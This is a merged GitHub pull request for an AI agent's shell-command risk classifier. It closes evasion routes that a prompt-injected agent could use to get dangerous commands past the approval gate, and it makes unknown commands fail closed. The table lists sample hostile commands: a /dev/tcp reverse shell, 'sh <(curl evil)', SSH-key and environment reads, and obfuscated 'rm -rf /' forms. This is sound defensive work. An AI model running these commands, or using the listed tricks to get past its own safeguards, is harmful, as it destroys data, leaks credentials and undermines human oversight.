harden(danger): close classifier evasion vectors + fail closed on unknown commands#5
Merged
Merged
Conversation
The risk classifier is the approval gate's first line of defense, so it
must assume a prompt-injected agent is actively trying to disguise a
dangerous command as harmless. A review surfaced several bypasses where
a destructive/exfiltrating command under-classified to safe/local_write
(i.e. ran without a prompt). This closes them in layers:
Tokenizer
- Quote boundaries are no longer word boundaries: r""m, "rm", r''m all
resolve to `rm` again (empty/adjacent quotes used to split the verb).
Structural decomposition
- Every pipe stage is classified, not just the head command, so
`true | dd of=/dev/sda`, `: | wget … -O /tmp/x` and
`echo x | sudo rm -rf /home` are seen for what their later stages do.
Wrapper unwrapping
- Leading exec wrappers (env, xargs, nohup, nice, setsid, timeout, …)
are stripped so the real command is classified; sudo/doas/pkexec set a
system_write floor and let the inner command escalate (sudo rm -rf /var
→ destructive, instead of being masked as system_write).
Verb-independent resource scanning
- /dev/tcp and /dev/udp (reverse-shell channels) → network_egress.
- Reads/writes of sensitive credential paths (~/.ssh, /etc/shadow,
~/.aws/credentials, /proc/self/environ, …) → system_write.
Payload re-classification & normalisation
- bash/sh -c '…' payloads and <(…)/>(…) process substitutions are
re-classified (a shell given anything to execute → code_execution).
- New normalisation passes: ANSI-C $'\x72\x6d', brace expansion {rm,-rf,/}.
Detection coverage
- rm: robust recursive/force flag parsing (-rfv, -Rf, --recursive
--force) and relative wipe targets (~, $HOME, *, ., ..).
- dd: broadened raw block-device list (vd/hd/xvd/mmcblk/disk/loop/dm).
- network: socat, rclone, dig/nslookup/host/drill, aria2c/axel/httpie.
- code exec: source/., npx/bunx/uvx/pipx, pnpm|yarn dlx, uv run,
find -exec.
- install: pnpm/yarn/bun/apk add|install.
The package doc now states the threat model, the layered design, and the
explicit limitations (variable indirection, dynamic construction,
non-enumerated transforms) — this is defence-in-depth, not a sandbox, so
it errs toward over-classification (an extra prompt) over silent misses.
One existing expectation updated: `sudo rm -rf /var/log` is now
destructive (was system_write) — the more accurate, more secure class.
New hardening_test.go pins each closed vector and guards benign commands
against over-classification. Full suite green; go vet clean.
Co-Authored-By: Claude Opus 4.8 (1M context) <noreply@anthropic.com>
Previously the classifier fell through to Safe (allow) for any command it didn't recognise, so the whole gate was fail-open: a novel or obfuscated verb that dodged every known-dangerous check ran unprompted. Flip it to fail-closed: - New Unknown risk class, default action Deny (same as Destructive), ranked just below Destructive so a single unknown stage dominates benign siblings in a pipeline/compound command. - classifyCommand now returns Safe only for a recognised command used benignly, and Unknown otherwise. - safeCommands: an explicit read-only/no-op allowlist (ls, cat, grep, sort, jq, stat, ps, git via existing prefixes, cd/export and other benign builtins, …) so ordinary inspection still classifies Safe. Mutating/code-executing tools are deliberately excluded — they must be allowlisted, not slip through unclassified. A safe command given a write redirect or system/sensitive path is still escalated first. - Leading VAR=val assignments are unwrapped (FOO=bar rm -rf / → rm), and an assignment-only command is a no-op (Safe). Side benefit: the variable-indirection limitation now denies rather than silently allows — `$X -rf /` reads as an Unknown verb. Configurable like any class: set "unknown": "prompt" for a softer profile, or use the allowlist for specific trusted tools. Godmode (action: allow) still allows it, exactly like Destructive. Docs and tests updated (rank/ActionFor expectations; new fail-closed, assignment-unwrap, and safe-allowlist coverage). Full suite green; vet clean. Co-Authored-By: Claude Opus 4.8 (1M context) <noreply@anthropic.com>
…wn class Extend the user-facing guide for setting up the "dangerous" approval policy, and bring the security/CLI/dev docs in line with the new 9-class model (adds the fail-closed `unknown` class). DOCKER_COMPOSE_USER_GUIDE.md §5a now has a full field-by-field setup guide for the restricted profile: - what each key does (sandbox/action/non_interactive/classes/allow/deny) - the 9-class table with built-in vs profile actions - the action-resolution precedence (allowlist → denylist → classes → blocked → action → built-in default → non_interactive) - a gotcha: a global "action" overrides EVERY unlisted class, so the shipped restricted profile prompts even on `safe` (`ls`) unless you add "safe": "allow" or omit "action" — both shown - customisation recipes (tighten / loosen / allowlist one tool / lockdown) CLI.md, SECURITY.md, DEVELOPMENT.md: add the `unknown` class, state the fail-closed default, refresh the evasion list and regression-suite pointers. No code changes. Co-Authored-By: Claude Opus 4.8 (1M context) <noreply@anthropic.com>
Keep all documentation under docs/. Update the in-file Reference links (docs/X.md → X.md, now siblings) and the inbound pointer from docker/README.md (../ → ../docs/). Co-Authored-By: Claude Opus 4.8 (1M context) <noreply@anthropic.com>
1453a50 to
91343e3
Compare
Self-review of the fail-closed change surfaced consumers that enumerate risk classes but were never taught about the new Unknown class, plus two classifier correctness bugs. Fixes: 1. Sub-agent risk caps ignored Unknown (cmd/odek/subagent.go). The mirror riskRank() had no Unknown case (returned 0) and the untrusted + maxRisk clamp loops didn't list it. Result: max_risk="unknown" denied even Safe, and a capped/untrusted sub-agent never force-denied Unknown when the inherited config loosened it. Root cause was the duplicated ranking, so export danger.Rank as the single source of truth (rank→Rank) and have subagent.go use it; add danger.Unknown to both clamp loops. 2. Trust-class shortcut allowed Unknown (internal/danger/approver.go, cmd/odek/wsapprover.go). "Trust class for session" was disabled only for Destructive/Blocked, so a single grant could blanket-approve every future unrecognised verb — the exact approval-fatigue attack the exclusion exists to stop. Exclude Unknown too. 3. dd to a character device misclassified destructive (classifier.go). isDestructive's of= branch matched any "/dev/" substring, so the common `dd ... of=/dev/null` / `of=/dev/stdout` idioms were denied. Use the precise containsBlockDevice matcher (also dedupes the device logic). 4. ANSI-C octal over-read (classifier.go decodeEscape). The loop consumed up to 4 octal digits; bash takes at most 3. `$'\1551'` now decodes to "m1" (octal 155 + literal 1), matching the shell, not a single byte. Regression tests added for each; rank→Rank rename propagated through the danger package and its tests. Full suite green; go vet clean. Co-Authored-By: Claude Opus 4.8 (1M context) <noreply@anthropic.com>
Follow-up to the Unknown-class fixes — the lower-severity review items: 5. shell tool description (cmd/odek/shell.go): add the `unknown` class and state the fail-closed default, so the model driving the tool can reason about why an unrecognised command was denied. 6. sensitivePathFragments (classifier.go): document why it is deliberately separate from ClassifyPath's home-sensitive-dir list (token-substring, credential reads vs absolute-path write-risk) so the overlap doesn't get "deduped" into a behavior change, and so a maintainer updating one considers the other. 7. safeCommands (classifier.go): extend the read-only allowlist with common modern CLIs (fd, eza/exa/lsd, htop/btop/glances, pstree/procs, duf, dust, delta, hexyl, glow) so fail-closed doesn't deny routine inspection. 8. classifyStage (classifier.go): pass a pipedInto flag instead of having classifyPipeline re-run unwrapWrappers on each non-head stage purely to read the head command — one unwrap per stage now. 9. hasSystemRedirectTarget → touchesSystemPath (classifier.go): the function flags ANY system-path token, not just redirect targets, and is NOT redundant with isSystemWrite (verified: it catches `cat /etc/foo` and unknown tools pointed at /usr, and runs after isLocalWrite). Renamed for accuracy with a comment on why both checks exist. Behavior change is limited to #7 (more tools classify Safe). Regression test for the new safe tools added. Full suite green; go vet clean. Co-Authored-By: Claude Opus 4.8 (1M context) <noreply@anthropic.com>
CodeQL flagged incorrect type conversion: strconv.ParseUint was parsing into a 16-bit target (8, 16) then casting to uint8 without bounds checking. Since octal escapes in bash are always mod 256 (fit in uint8), parse directly as 8-bit (8, 8) to ensure the conversion is safe and eliminate the CodeQL warning. All tests pass including TestHardening_ANSICOctalDigitCap. Co-Authored-By: Claude Haiku 4.5 <noreply@anthropic.com>
jkyberneees
added a commit
that referenced
this pull request
Jun 5, 2026
#7) * feat(schedule): native in-process scheduler core (phase 1) Introduce internal/schedule — the engine for odek's native cron capability, replacing the Docker + supercronic approach. Running in-process means the host already has resolved config (API key, model, bot token, default chat) in memory, so a scheduled task sees exactly what an interactive one does — no environment-inheritance games, no external cron daemon, no container-only behaviour. This phase is the standalone core only — no CLI or bot wiring yet. - types.go: Job / Delivery / RunState. Definitions and runtime state persist to separate files so a hand-edit never races a state write. - cronexpr.go: stdlib-only 5-field cron parser (ranges, steps, lists, names, @macros) with correct Vixie dom/dow union semantics, timezone-aware Next() via coarse unit-stepping, and a horizon that clears the leap-century gap. - store.go: atomic (temp+rename, 0600) CRUD for schedules.json and schedule-state.json, mirroring session.Store; validates jobs on write. - scheduler.go: firing engine decoupled from the agent/telegram via Runner and Deliverer interfaces. Earliest-fire timer (no per-minute polling), bounded concurrency, per-job overlap guard, missed-run skip/catchup policy, mtime hot-reload, and graceful drain on context cancellation. Tests: 39 cases, 87.9% coverage, green under -race. Parser table tests (ranges/steps/lists/names/macros/dom-dow union/leap day/timezone/errors); engine tests drive reconcile/fireDue directly with explicit clocks plus one real-clock lifecycle test — deterministic, no flaky sleeps. Co-Authored-By: Claude Opus 4.8 (1M context) <noreply@anthropic.com> * feat(schedule): odek schedule CLI + headless runner/deliverers (phase 2) Wire the scheduler core into the CLI and give it a way to actually run tasks. - cmd/odek/schedule.go: `odek schedule <list|add|rm|enable|disable|run|next|daemon>`. * add: flag-parsed (--name/--cron/--deliver/--tz/--catchup/--disabled) with a trailing task; validates and shows the next fire. * list: tabular view with computed next-fire (local time) and last status. * next: previews upcoming fires for a job ID or a raw expression. * run: fires one job immediately and delivers (test a job). * daemon: foreground scheduler with a singleton pid lock (refuses a second instance rather than usurping a live one) and graceful SIGINT/SIGTERM drain. - runTaskHeadless: builds a fresh agent with a silent (io.Discard) renderer, interaction off, and no approver — the resolved danger policy governs what an unattended task may do, mirroring non-interactive `odek run`. - agentRunner / cliDeliverer implement the schedule.Runner / schedule.Deliverer interfaces; delivery routes to stdout, ~/.odek/schedule.log, or Telegram (honouring a per-job chat ID, falling back to default_chat_id). - dispatch + printUsage wired for the new command. Tests cover parseDeliver, deliverString, firstWords, jobSchedule, and the deliverer branches (log append, telegram misconfig errors, unknown kind). Smoke-tested end to end: add/list/next/enable/disable/rm, schedules.json at 0600, and daemon start → second-instance refused → clean SIGINT drain. Co-Authored-By: Claude Opus 4.8 (1M context) <noreply@anthropic.com> * feat(schedule): run the scheduler inside odek telegram (phase 3) The Telegram bot now hosts the scheduler in-process, so reminders and the bot share one runtime — the whole reason to go native. No separate cron daemon, no environment-inheritance problem. - startSchedulerForBot: launched after the poller, stopped on ctx cancel. It acquires the shared schedule pid-lock; if an external `odek schedule daemon` already holds it, the bot defers (logs and skips) rather than double-firing. - telegramRunner: runs each job headless and accounts token usage against the bot's daily budget — pre-flight refuse when exhausted, bill the run after. - telegramDeliverer: delivers via the LIVE bot for telegram jobs (sharing its client and 429 backoff) and falls back to the CLI deliverer for stdout/log. - runTaskHeadless now captures cumulative tokens via an IterationCallback, so the Runner's token count is real (engine logs it; bot bills it). - Graceful restart releases the schedule lock before os.Exit, mirroring the Telegram instance lock, so the restarted child's scheduler re-acquires cleanly. Tests: embedded deliverer routing — live-bot send, default-chat fallback, no-chat error, and stdout/log fallback — via the recording test bot. Full cmd/odek suite green under -race; whole module suite green, vet + fmt clean. Co-Authored-By: Claude Opus 4.8 (1M context) <noreply@anthropic.com> * feat(schedule): schedules config section + docs (phase 4) Make the scheduler configurable and documented. - internal/config: new `schedules` section (enabled, max_concurrent, timezone, catchup) with the same file→env→default layering as every other section. resolveSchedules + ODEK_SCHEDULES_* env overrides + overlayFile handling. Defaults: enabled=true, max_concurrent=2, timezone=UTC, catchup=false. - cmd/odek: the daemon and the embedded (bot) scheduler now build their engine Options from resolved.Schedules via a shared schedulerOptions helper (max-concurrent, default timezone, catchup). The embedded scheduler is gated on schedules.enabled so it can be turned off in favour of a standalone daemon. - docs: new docs/SCHEDULES.md (canonical guide — runtime models, CLI, cron syntax incl. Vixie dom/dow coupling, delivery, the unattended-safety policy, config, missed-run behaviour); a Schedules section in CONFIG.md; a feature bullet in README. Tests: resolveSchedules defaults/overrides/partial, and LoadConfig wiring for defaults and ODEK_SCHEDULES_* env. Full config + schedule + cmd suites green, vet + fmt clean. Co-Authored-By: Claude Opus 4.8 (1M context) <noreply@anthropic.com> * feat(docker): retire supercronic, use the native scheduler (phase 5) The bot now hosts the in-process scheduler (phase 3), so the container needs no external cron at all. Remove the supercronic scaffolding entirely. - Dockerfile: drop the supercronic download (and its ARG TARGETARCH/SHA pin), the ~/.crontabs dir, and the cron-entrypoint.sh wrapper. ENTRYPOINT is back to ["odek"]. The image no longer needs --build-arg TARGETARCH. - docker-compose: remove the ./crontab bind mounts from both telegram services. Keep init: true (now justified generally — reap agent-spawned children and forward SIGTERM), with an honest comment. - Delete docker/cron-entrypoint.sh and docker/crontab. - spawnChild: remove the now-dead ODEK_ENTRYPOINT re-exec branch (it only existed to restart supercronic via the wrapper). A restarted `odek telegram` starts its own embedded scheduler goroutine; gracefulRestart still releases the schedule lock so the child re-acquires cleanly. Drop the two obsolete ODEK_ENTRYPOINT tests. - docs: docker/README + .env.example now describe the native scheduler (`odek schedule`, jobs in ./.odek/schedules.json); TELEGRAM.md points to SCHEDULES.md from its OS-cron section. Validated: image builds without TARGETARCH, supercronic absent from the image, ENTRYPOINT runs odek, and `odek schedule next` works inside the container. Compose config valid; full module suite green, vet + fmt clean. Co-Authored-By: Claude Opus 4.8 (1M context) <noreply@anthropic.com> * fix(schedule): address code-review findings Ten findings from the high-effort review of the native scheduler: #1 (security) Unattended tasks could silently run dangerous ops: a nil approver with no TTY falls back to NonInteractiveAction(), which defaults to ALLOW. Set a "deny" floor in runTaskHeadless when the policy doesn't explicitly choose one (mirrors sub-agent hardening); explicit allow/deny (godmode/restricted) honoured. #2 (correctness) cron parseField flagged a dom/dow field as a wildcard whenever it merely started with "*", so a list like "*/2,15" broke the Vixie union rule (AND instead of OR). Now star is set only when EVERY comma item is wildcard-based. #3 (correctness) The Run loop did a blocking `sem <- {}` in fireDue, so MaxConcurrent hung jobs wedged shutdown/reload. Now the sem acquire selects on ctx (clearing the overlap guard for undispatched jobs), and each run is bounded by Options.RunTimeout (default 15m). #4 (correctness) Budget pre-check used CheckDailyBudget(1), which persists +1 per fire. Switched to read-only DailyTokenUsage() for the gate; actual cost still billed after the run. #5 (robustness) acquireScheduleLock now does a /proc/<pid>/cmdline identity check so a recycled PID can't make the scheduler refuse to start forever; pid file tightened to 0600. #6 (correctness) Missed-run detection trusted a persisted NextRun even after the cron changed while down. RunState now records the schedule signature; reconcile ignores NextRun when the sig differs (no spurious catchup/skip). #7 (efficiency) MCP servers were reconnected per fire. They're now connected once at daemon/bot startup and shared across fires (the MCP client is mutex-safe); builtin tools stay fresh per fire. #8 (efficiency) reconcile re-parsed cron + LoadLocation for unchanged jobs every reload. The sig short-circuit now runs before compile(). #9 (cleanup) Hoisted the repeated `cfg.Schedules == nil` guard in loader.go. #10 (cleanup) Daemon reuses telegram.NewFileLogger instead of a hand-rolled stderrLogger (deleted). Tests: cron union for step-lists + plain-step-still-wildcard; cron-changed-while- down (no false catchup); fireDue unblocks on ctx cancel with a full semaphore. Full suite green under -race, vet + fmt clean. Co-Authored-By: Claude Opus 4.8 (1M context) <noreply@anthropic.com> * fix(schedule): address ultrareview findings Nine findings from the cloud multi-agent review. bug_005 (normal) Impossible cron expressions (e.g. "0 0 30 2 *", Feb 30) passed Validate but Next() returns the zero time, which the engine treated as perpetually due → fired every tick forever, burning tokens. Now Validate rejects them at add time, and reconcile/fireDue defensively skip a zero next-fire (for hand-edited files). bug_009 (normal) The embedded scheduler's stop closure tore down shared MCP connections and the lock without waiting for in-flight jobs to drain, causing broken-pipe errors persisted as bogus failure state. The closure now waits on a done channel (20s bound) before cleanup. bug_013 (normal) gracefulRestart calls os.Exit(0), which skips deferred stopScheduler → mcpCleanup never ran → MCP child processes (Playwright/Chromium) leaked on every /restart. Added mcpCleanupRef, invoked before os.Exit like scheduleUnlockRef. bug_007 (normal) reconcile reseeded s.runs from disk in the unchanged branch, clobbering an in-flight fire's increment → lost Runs counts. It now skips the reseed for unchanged/running jobs. Also moved the missed-fire SaveState out of the s.mu critical section and stopped swallowing its error. bug_004 (normal) runTaskHeadless used RunWithMessages with a bare system message, so RuntimeContext (host/cwd/date) never reached the LLM — date-aware jobs ("summarize today's calendar") had no notion of "today". Switched to agent.Run, which prepends the engine's runtime-context-inclusive system message. bug_014 (nit) Deliverer.Deliver took no context, so a stuck Telegram send blocked the drain. Added ctx to the interface + bot.SendMessageContext; the scheduler passes the run ctx through. bug_015 (nit) Concurrent CLI mutations could lose writes (read-modify-write with only an in-process mutex). Added an flock on ~/.odek/schedules.lock around the store's write methods. bug_006 (nit) scheduleNext swallowed store errors → misleading "bad cron" on a corrupt store. It now returns the store error. bug_002 (nit) docker/README + SCHEDULES.md misdescribed the lock as symmetric; reworded to note the bot defers silently while the daemon refuses to start. Tests: impossible-cron rejected (Validate) + skipped (reconcile); unchanged reconcile preserves in-memory Runs. Full suite green under -race, vet + fmt clean. Co-Authored-By: Claude Opus 4.8 (1M context) <noreply@anthropic.com> * test(schedule): cover error paths and edge cases to 99.6% Add targeted tests for the native scheduler package and its CLI glue, raising internal/schedule statement coverage from 87.8% to 99.6% (the only remaining gap is the best-effort flock syscall-error fallback). internal/schedule/coverage_test.go exercises: - store error paths: NewStore HOME failure, NewStoreAt mkdir failure, corrupt-file loadDoc/loadState propagation across all CRUD methods, writeJSONAtomic marshal/write/rename failures, version defaulting, null states map, fileLock open failure, and the List ID tiebreak. - scheduler branches: reload-on-mtime-change, reconcile List/LoadState errors, skip- and execute-time SaveState failures, zero next-fire drop, timeToNext empty/past/near cases, compile bad-timezone, and preview truncation. - cronexpr branches: nil-location default, empty field, range/empty value parse errors, and a month mismatch in Matches. cmd/odek/schedule_cli_test.go covers the non-LLM CLI surface: list, add, rm, enable/disable, next, command dispatch, scheduler options, MCP no-op, schedule lock acquire/release, embedded-scheduler lifecycle, and the telegram budget gate. * docs: make docs consistent with the native scheduler The native scheduler landed with its own docs (SCHEDULES.md, CONFIG.md, TELEGRAM.md, docker/*) but left a few cross-references stale or missing. Bring the rest of the docs in line: - README.md: add the missing Scheduled Tasks row to the docs index (the feature section already linked SCHEDULES.md). - docs/index.html: add a Scheduled Tasks feature card mirroring README. - docs/CLI.md: list 'odek schedule' (and the previously-omitted 'odek telegram') in the command table; point '--deliver' at the native scheduler for recurring tasks. - docs/CHEATSHEET.md: add a schedule quick-reference (and telegram). - docs/DAILY-WORKER.md: correct the comparison table — odek now has native, in-process scheduling rather than 'None'. * feat(schedule): manage schedules from Telegram Add /schedules and /schedule slash commands so an authorized Telegram user can list, view, preview, add, enable/disable, remove, and test-run scheduled tasks without leaving the chat — closing the gap where the native scheduler was CLI/file-only. Command layer (cmd/odek/schedule_telegram.go): - /schedules lists jobs; /schedule <sub> dispatches add|view|next|run| enable|disable|rm|help. - add uses cron's fixed arity (an @macro or 5 fields) so no quoting is needed; options follow a literal '|' (deliver=, tz=, name=, catchup, disabled). Telegram delivery defaults to the originating chat. - run returns the job's task for the bot to dispatch through the normal agent pipeline (progress + approvals visible), test-running it in chat. - Replies use the existing MarkdownV2 pipeline; cron/IDs are wrapped in code spans to stay literal. Wiring: - Scheduler gains Reload() (buffered, coalescing) and a select case so in-chat edits reconcile immediately instead of waiting for the mtime poll; startSchedulerForBot now takes the shared store and publishes its Reload via scheduleReloadRef. - telegram.go creates one schedule.Store, shares it with the embedded scheduler, and intercepts the two commands in OnCommand. Safety/config: - New schedules.allow_telegram_management (default true, env ODEK_SCHEDULES_ALLOW_TELEGRAM_MANAGEMENT) gates the mutating verbs; read-only listing/preview always works. Access is already bounded by the bot's allowed_chats/allowed_users. Docs: SCHEDULES.md gains a 'Managing from Telegram' section; TELEGRAM.md, CONFIG.md, docker/README.md and .env.example updated. Tests cover the parser, every subcommand, the management gate, and the Reload trigger. * fix(schedule): format scheduled results for Telegram MarkdownV2 Scheduled task results were sent raw, so odek markdown like **bold** arrived as literal asterisks. Route both the CLI and embedded-bot deliverers through sendTelegramResult, which mirrors the live bot's SendResponse pipeline: convert to MarkdownV2, chunk via FormatResponse, and retry each chunk as plain text if Telegram rejects the formatting. Co-Authored-By: Claude Opus 4.8 (1M context) <noreply@anthropic.com> --------- Co-authored-by: Claude Opus 4.8 (1M context) <noreply@anthropic.com>
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
Add this suggestion to a batch that can be applied as a single commit.This suggestion is invalid because no changes were made to the code.Suggestions cannot be applied while the pull request is closed.Suggestions cannot be applied while viewing a subset of changes.Only one suggestion per line can be applied in a batch.Add this suggestion to a batch that can be applied as a single commit.Applying suggestions on deleted lines is not supported.You must change the existing code in this line in order to create a valid suggestion.Outdated suggestions cannot be applied.This suggestion has been applied or marked resolved.Suggestions cannot be applied from pending reviews.Suggestions cannot be applied on multi-line comments.Suggestions cannot be applied while the pull request is queued to merge.Suggestion cannot be applied right now. Please check back later.
Why
The
dangerclassifier is the approval gate's first line of defense. It must assume a prompt-injected agent is actively trying to disguise a dangerous command as harmless so it runs without a prompt. A deep review found several bypasses and a structural weakness: the gate failed open (anything unrecognized →Safe→ allow). This PR closes the bypasses and flips the default to fail-closed.Part 1 — Evasion vectors closed
r""m -rf /true | dd of=/dev/sdaecho x | sudo rm -rf /home/uenv rm -rf /etc,xargs rm -rf /etcsudo rm -rf /var/log-cpayloadbash -c 'rm -rf /'bash -i >& /dev/tcp/h/pcat ~/.ssh/id_rsa,cat /proc/self/environrm -rf ~,rm -rf *,rm -rfv /etc{rm,-rf,/},$'\x72\x6d' -rf /sh <(curl evil)socat,dig,npx,pnpm dlx,find … -exec,sourceLayers: tokenizer (quote boundaries are not word boundaries) · per-pipe-stage classification · wrapper unwrapping (
env/xargs/sudo/… ) · verb-independent resource scan (/dev/tcp, sensitive paths) · payload re-classification (bash -c,<(…)) · ANSI-C + brace normalization · broadenedrm/dd/network/exec/install detection.Part 2 — Fail closed on unknown commands
Previously a command whose verb matched no check fell through to
Safe(allow). Now:Unknownrisk class, default action Deny (same asDestructive), ranked just below destructive so one unknown stage dominates benign siblings (pip install x && weirdverb→ deny).safeCommands— an explicit read-only/no-op allowlist (ls,cat,grep,sort,jq,stat,ps, benign builtins likecd/export, …) keeps ordinary inspectionSafe. Mutating/code-executing tools are deliberately not here — they must be allowlisted, not slip through unclassified. A safe command with a write redirect or system/sensitive path is still escalated first.VAR=valassignments unwrapped (FOO=bar rm -rf /→ rm); assignment-only is a no-op.$X -rf /) now denies (unknown verb) instead of silently allowing.Per-profile config:
"unknown": "prompt"for a softer stance, or allowlist specific tools. Godmode (action: allow) still allows it, exactly like destructive. Note: in the default profile this means an unrecognized command (e.g.make,cargo build) is now denied unless allowlisted — that is the intended fail-closed posture.Docs & tests
Classifier package doc rewritten: threat model, layered design, fail-closed default, and explicit limitations (variable indirection, dynamic construction, non-enumerated transforms, known-verb escape hatches).
hardening_test.gopins every closed vector + the fail-closed / assignment-unwrap / safe-allowlist behavior; benign commands guarded against over-classification. Two existing expectations updated (sudo rm -rf /var/log→ destructive; rank/ActionFor for the new class). Fullgo test ./...green;go vetclean.🤖 Generated with Claude Code